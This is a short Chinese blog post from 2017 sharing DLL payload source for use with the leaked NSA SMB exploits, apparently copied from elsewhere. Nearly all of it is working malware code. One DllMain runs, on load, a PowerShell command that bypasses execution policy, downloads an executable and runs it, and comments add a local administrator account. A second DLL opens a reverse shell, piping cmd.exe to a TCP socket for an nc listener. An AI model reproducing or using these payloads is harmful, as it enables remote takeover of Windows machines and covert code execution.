NSA SMB dll code 发表于 2017-04-20 这两天最火的是啥?方程式!dll 源码 转眼就是是5.20了,回头才发现一个月没写博客了,好浪费啊,没办法,最近太忙了 记录一下自己用的dll源码吧 其实也是网上抄的。。。123456789101112131415161718192021222324252627282930313233343536373839// dllmain.cpp : 定义 DLL 应用程序的入口点。#include "stdafx.h"#include <windows.h>void Fuck(void);BOOL WINAPI DllMain(HANDLE hDll, DWORD dwReason, LPVOID lpReserved){ switch (dwReason) { case DLL_PROCESS_ATTACH: Fuck(); break; case DLL_PROCESS_DETACH: break; case DLL_THREAD_ATTACH: break; case DLL_THREAD_DETACH: break; } return TRUE;}void Fuck(void) { WinExec("cmd.exe /c powershell.exe -exec bypass -Command (New-Object Net.WebClient).DownloadFile('http://127.0.0.1/1.exe','C:\\Windows\\Temp\\temp.exe');C:\\Windows\\Temp\\temp.exe", SW_NORMAL); //WinExec("net localgroup administrators admin /add", SW_NORMAL); //WinExec("cmd.exe /c dir > c://result.txt", SW_NORMAL); //WinExec("Cmd.exe /C md c://12", SW_HIDE); } 1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162636465666768697071727374757677787980818283848586878889909192// dllmain.cpp : 定义 DLL 应用程序的入口点。#include "stdafx.h"#include <winsock2.h> #include <stdlib.h>#pragma comment(lib,"ws2_32")void reverse_shell();WSADATA wsaData;SOCKET Winsock;SOCKET Sock;struct sockaddr_in hax;STARTUPINFO ini_processo;PROCESS_INFORMATION processo_info;BOOL WINAPI DllMain(HANDLE hDll, DWORD dwReason, LPVOID lpReserved){ switch (dwReason) { case DLL_PROCESS_ATTACH: reverse_shell(); break; case DLL_PROCESS_DETACH: break; case DLL_THREAD_ATTACH: break; case DLL_THREAD_DETACH: break; } return TRUE;}void reverse_shell(){ LPCSTR szMyUniqueNamedEvent = "sysnullevt"; HANDLE m_hEvent = CreateEventA(NULL, TRUE, FALSE, szMyUniqueNamedEvent); switch (GetLastError()) { // app is already running case ERROR_ALREADY_EXISTS: { CloseHandle(m_hEvent); break; } case ERROR_SUCCESS: { break; } } WSAStartup(MAKEWORD(2, 2), &wsaData); Winsock = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, (unsigned int)NULL, (unsigned int)NULL); hax.sin_family = AF_INET; //nc -lvvp 4431 本机nc监听 // 端口 hax.sin_port = htons(atoi("4431")); //反弹ip hax.sin_addr.s_addr = inet_addr("127.0.0.1"); WSAConnect(Winsock, (SOCKADDR*)&hax, sizeof(hax), NULL, NULL, NULL, NULL); memset(&ini_processo, 0, sizeof(ini_processo)); ini_processo.cb = sizeof(ini_processo); ini_processo.dwFlags = STARTF_USESTDHANDLES; ini_processo.hStdInput = ini_processo.hStdOutput = ini_processo.hStdError = (HANDLE)Winsock; CreateProcessA(NULL, "cmd.exe", NULL, NULL, TRUE, CREATE_NO_WINDOW, NULL, NULL, (LPSTARTUPINFOA)&ini_processo, &processo_info);}